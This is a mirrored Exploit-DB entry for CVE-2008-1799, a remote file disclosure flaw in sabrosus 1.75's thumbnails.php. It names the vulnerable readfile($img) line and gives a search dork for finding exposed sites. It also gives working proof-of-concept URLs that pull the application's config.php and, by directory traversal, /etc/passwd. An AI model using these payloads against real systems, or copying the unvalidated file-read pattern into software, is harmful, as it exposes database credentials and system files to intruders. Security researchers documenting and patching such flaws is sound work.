- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5360
- Проверка EDB
-
- Пройдено
- Автор
- HACKER_EGY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-1799
- Дата публикации
- 2008-04-04
Код:
#######################################################
<<<<<< Remote File Disclosure Vulnerability >>>>>>
sabrosus 1.75 (thumbnails.php)
#######################################################
## AUTHOR : HaCkeR_EgY
## My HoMe : www.PaL-HaCker.com
## ConTacT : [email protected]
###############################################################################
## Download Script : http://sourceforge.net/project/downloading.php?groupname=sabrosus&filename=sabrosus1-75.zip&use_mirror=garr
## vurn C0de :
in (thumbnails.php)
line 82
readfile ($img) <===
## Dork : Powered by sabros.us
## PoC: http://localhost/sabrosus/thumbnails.php?img=include/config.php
http://localhost/sabrosus/thumbnails.php?img=../../../../../../../../etc/passwd
#################################################################################
## GREETZ TO : My BrOther and My MasTer " Abo Mohamed "
## Thanx : FiReSell , MoHamed EL Arab , Mr.exe , zaradusht , M$s D@nG3rS ,and all " pal-hacker members "
#####################################################################################
# milw0rm.com [2008-04-04]- Источник
- www.exploit-db.com
